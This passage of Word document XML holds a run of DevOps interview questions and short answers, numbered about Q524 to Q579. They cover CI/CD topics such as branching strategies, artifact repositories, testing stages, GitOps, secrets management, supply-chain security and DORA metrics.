      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Webhook triggers start a pipeline or workflow when an external event occurs, such as a Git push, pull request, image push, or issue update. They make CI/CD event-driven instead of relying only on schedules or manual execution.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Webhook Triggers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Q525. What are pipeline stages?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pipeline stages are logical phases in CI/CD such as checkout, build, test, scan, package, deploy, and verify. Separating stages improves visibility, failure isolation, approval control, and reuse.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Pipeline Stages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Q526. Explain artifact repositories.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Artifact repositories store build outputs such as JAR files, Docker images, Helm charts, Python packages, and model artifacts. They provide versioning, access control, retention, vulnerability scanning, and reliable promotion between environments.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Artifact Repositories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Q527. What is Nexus?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Nexus Repository is an artifact repository manager used to host and proxy packages such as Maven, npm, PyPI, NuGet, raw artifacts, and container images. It helps teams centralize artifacts, cache dependencies, and control what enters production pipelines.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Nexus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Q528. Explain JFrog Artifactory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: JFrog Artifactory is an enterprise artifact repository that stores, manages, scans, and promotes binaries across CI/CD pipelines. It supports many package formats and is often paired with Xray for security and compliance scanning.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Jfrog Artifactory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Q529. What is semantic versioning?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Semantic versioning is a version format like MAJOR.MINOR.PATCH. Major changes indicate breaking changes, minor changes add backward-compatible features, and patch changes fix bugs without changing compatibility.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Semantic Versioning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Q530. Explain branching strategies.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Branching strategies define how teams create, merge, protect, and release code branches. Common approaches include GitFlow, trunk-based development, release branches, and feature branches.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Branching Strategies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Q531. What is GitFlow?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GitFlow is a branching model that uses long-lived main and develop branches plus feature, release, and hotfix branches. It works for controlled release cycles but can become heavy for fast-moving CI/CD teams.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Gitflow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Q532. Explain trunk-based development.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Trunk-based development keeps most work close to a single main branch, with short-lived branches and frequent merges. It supports faster integration, smaller changes, feature flags, and continuous delivery.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Trunk-based Development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Q533. What is feature branching?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Feature branching means creating a separate branch for a specific feature or change and merging it after review and testing. It provides isolation, but long-lived feature branches can create merge conflicts and delayed feedback.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Feature Branching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Q534. Explain merge conflicts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Merge conflicts occur when Git cannot automatically combine changes from different branches. They are resolved by reviewing the conflicting files, choosing the correct final content, testing the result, and committing the resolution.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Merge Conflicts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Q535. What are protected branches?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Protected branches enforce rules before code can be merged into important branches such as main or release. Rules often include required reviews, passing checks, signed commits, branch restrictions, and no force pushes.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Protected Branches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Q536. Explain code review process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Code review is the practice of having peers inspect changes before merge. A strong review checks correctness, maintainability, security, test coverage, observability, and whether the change matches the intended design.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Code Review Process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Q537. What is static code analysis?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Static code analysis examines source code without executing it to find bugs, security risks, style issues, and maintainability problems. It is usually run early in CI so developers get quick feedback.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Static Code Analysis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Q538. Explain SonarQube.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: SonarQube is a code quality and static analysis platform that detects bugs, vulnerabilities, code smells, duplication, and coverage gaps. Teams use quality gates in CI/CD to prevent risky code from moving forward.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Sonarqube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Q539. What is shift-left testing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Shift-left testing means moving testing, security checks, and quality validation earlier in the development lifecycle. It reduces cost and risk by finding problems before deployment.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Shift-left Testing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Q540. Explain unit testing in CI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Unit testing in CI runs small, fast tests automatically whenever code changes. It validates individual functions or components and gives developers quick confidence before integration and deployment stages.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Unit Testing In Ci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Q541. What is integration testing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Integration testing verifies that multiple components work together correctly, such as APIs, databases, queues, and external services. In CI/CD, it often runs after unit tests and before deployment promotion.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Integration Testing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Q542. Explain smoke testing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Smoke testing is a small set of critical checks that confirms a build or deployment is basically functional. It is commonly run immediately after deployment to catch obvious failures quickly.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Smoke Testing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Q543. What is regression testing?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Regression testing verifies that existing functionality still works after a change. It protects against accidental breakage and is an important gate before release.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Regression Testing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Q544. Explain pipeline parallelism.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pipeline parallelism runs independent CI/CD jobs at the same time, such as test suites, scans, or builds for multiple services. It reduces overall pipeline duration while preserving required dependencies between stages.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Pipeline Parallelism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Q545. What is deployment gating?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Deployment gating adds controlled checks before a release proceeds, such as tests, approvals, security scans, error-budget checks, or canary metrics. Gates reduce the chance of bad releases reaching production.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Deployment Gating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Q546. Explain approval workflows.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Approval workflows require authorized people or automated policy checks before moving a release to sensitive environments. They are useful for production deployments, compliance-controlled systems, and high-risk changes.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Approval Workflows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Q547. Explain self-hosted runners.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Self-hosted runners are CI/CD agents managed by the organization rather than the CI provider. They are useful for private network access, custom hardware, special tooling, larger workloads, or strict compliance requirements.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Self-hosted Runners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Q548. What is GitOps reconciliation?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: GitOps reconciliation is the continuous process of comparing the desired state in Git with the actual cluster state and applying changes to remove differences. This keeps infrastructure and applications aligned with version-controlled configuration.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>GitOps Reconciliation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Q549. Explain drift detection in GitOps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Drift detection in GitOps identifies when live resources differ from the desired state stored in Git. Drift may come from manual changes, failed deployments, or external controllers, and it should be corrected through reconciliation or approved Git changes.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Drift Detection In GitOps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Q550. What is sealed secrets?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Sealed Secrets is a Kubernetes approach for storing encrypted secrets safely in Git. A controller decrypts the sealed secret inside the cluster, allowing GitOps workflows without committing plain-text secrets.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Sealed Secrets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Q551. Explain secret injection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Secret injection provides applications with secrets at runtime through environment variables, mounted files, sidecars, or CSI drivers. The goal is to avoid hardcoding secrets in code, images, or Git repositories.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Secret Injection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Q552. What is HashiCorp Vault?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: HashiCorp Vault is a secrets management platform that stores, generates, rotates, and controls access to sensitive data such as passwords, API keys, certificates, and database credentials. It supports dynamic secrets, audit logs, policies, and integrations with Kubernetes and cloud IAM.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Hashicorp Vault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Q553. Explain secret rotation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Secret rotation replaces credentials regularly or after suspected exposure. Mature rotation is automated, audited, tested, and designed so applications can pick up new credentials without downtime.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Secret Rotation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Q554. What is immutable deployment?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Immutable deployment means every release creates a new artifact or environment instead of modifying an existing one in place. This improves reproducibility, rollback, and auditability because old versions remain available.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Immutable Deployment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Q555. Explain canary rollout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A canary rollout gradually sends a small percentage of traffic to a new version before full release. Metrics such as errors, latency, saturation, and business KPIs decide whether to continue, pause, or roll back.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Canary Rollout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Q556. Explain progressive delivery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Progressive delivery releases changes gradually using canaries, feature flags, traffic shifting, and automated analysis. It reduces blast radius and allows data-driven rollout decisions.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Progressive Delivery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Q557. What is Argo Rollouts?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Argo Rollouts is a Kubernetes controller for advanced deployment strategies such as canary and blue-green releases. It integrates with metrics providers and ingress controllers to automate progressive delivery decisions.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Argo Rollouts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Q558. Explain deployment metrics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Deployment metrics measure release health and delivery performance. Common examples include success rate, rollback rate, deployment frequency, lead time, change failure rate, latency, errors, and saturation after release.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Deployment Metrics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Q559. What is deployment frequency?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Deployment frequency is a DORA metric that measures how often teams successfully deploy to production. Higher frequency usually indicates mature automation, smaller changes, and better release confidence.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Deployment Frequency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Q560. Explain MTTR.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: MTTR, or Mean Time To Recovery, measures how long it takes to restore service after an incident. Lower MTTR comes from strong observability, runbooks, rollback automation, on-call readiness, and clear incident command.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>MTTR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Q561. What is lead time for changes?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Lead time for changes is the time from code commit to successful production deployment. It shows how quickly an organization can deliver value safely.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Lead Time For Changes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Q562. Explain DORA metrics.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: DORA metrics measure software delivery performance using deployment frequency, lead time for changes, change failure rate, and MTTR. They help teams improve delivery speed and reliability together.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>DORA Metrics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Q563. What is policy as code?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Policy as code means writing governance, security, and compliance rules as executable code. It allows automated enforcement in CI/CD, Kubernetes admission, Terraform plans, and cloud environments.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Policy As Code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Q564. Explain OPA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: OPA, or Open Policy Agent, is a policy engine that evaluates rules written in Rego. It is commonly used for Kubernetes admission control, CI/CD policy checks, API authorization, and infrastructure governance.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Opa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Q565. What is CI/CD anti-pattern?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A CI/CD anti-pattern is a pipeline practice that reduces speed, safety, or reliability. Examples include long-running pipelines, manual undocumented steps, untested deployments, shared mutable artifacts, secrets in logs, and skipping rollback planning.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>CI/CD Anti-pattern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Q566. Explain environment promotion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Environment promotion moves the same tested artifact through environments such as dev, staging, and production. Mature promotion changes configuration per environment but avoids rebuilding the artifact for each stage.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Environment Promotion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Q567. What is release management?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Release management coordinates planning, approval, rollout, communication, rollback, and measurement of production changes. In modern DevOps it is automated where possible and governed by risk-based controls.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Release Management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Q568. Explain infrastructure pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: An infrastructure pipeline automates provisioning, validation, policy checks, and deployment of infrastructure as code. It usually runs formatting, plan, security scanning, approval, apply, and drift checks.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Infrastructure Pipeline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Q569. What is build reproducibility?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Build reproducibility means the same source, dependencies, and configuration produce the same artifact. It requires pinned versions, locked dependencies, deterministic builds, traceable metadata, and controlled build environments.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Build Reproducibility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Q570. Explain dependency scanning.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Dependency scanning checks third-party libraries and packages for known vulnerabilities, license risks, and outdated versions. It is a key supply-chain security control in CI/CD.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Dependency Scanning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Q571. What is SAST?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: SAST, or Static Application Security Testing, scans source code or compiled code for security vulnerabilities without running the application. It helps detect issues such as injection risks, insecure APIs, and unsafe coding patterns early.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Sast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Q572. Explain DAST.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: DAST, or Dynamic Application Security Testing, tests a running application from the outside to find security issues. It can detect problems such as authentication flaws, exposed endpoints, and runtime misconfigurations.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Dast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Q573. What is software supply chain security?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Software supply chain security protects the full path from source code to production artifact. It includes dependency scanning, signed commits, secure builds, SBOMs, provenance, image signing, vulnerability management, and controlled deployment.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Software Supply Chain Security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Q574. Explain SBOM generation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: SBOM generation creates a Software Bill of Materials listing the components, libraries, versions, and dependencies in an application or image. SBOMs help vulnerability response, compliance, and supply-chain transparency.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Sbom Generation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Q575. What is pipeline observability?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Pipeline observability gives visibility into CI/CD execution using metrics, logs, traces, artifacts, durations, queue times, failure causes, and deployment outcomes. It helps teams optimize slow pipelines and quickly debug failures.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Pipeline Observability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Q576. Explain flaky tests.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Flaky tests pass and fail unpredictably without code changes. They reduce trust in CI and should be isolated, fixed, quarantined when necessary, and measured so they do not block delivery repeatedly.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Flaky Tests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Q577. What is deployment freeze?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A deployment freeze is a planned pause on production releases during high-risk periods such as holidays, audits, migrations, or major business events. Emergency fixes usually follow a controlled exception process.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Deployment Freeze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Q578. Explain rollback automation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: Rollback automation restores a previous working version quickly when a release fails. It should include artifact versioning, database safety, traffic switching, health checks, and clear criteria for rollback.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Rollback Automation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Q579. What is feature flag?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A feature flag controls functionality at runtime without requiring a new deployment. It supports gradual rollout, A/B testing, fast disablement, and safer releases.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Detailed interview explanation:</w:t>
        <w:br/>
        <w:t>Feature Flag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Q580. Explain LaunchDarkly.</w:t>
      </w:r>
    </w:p>
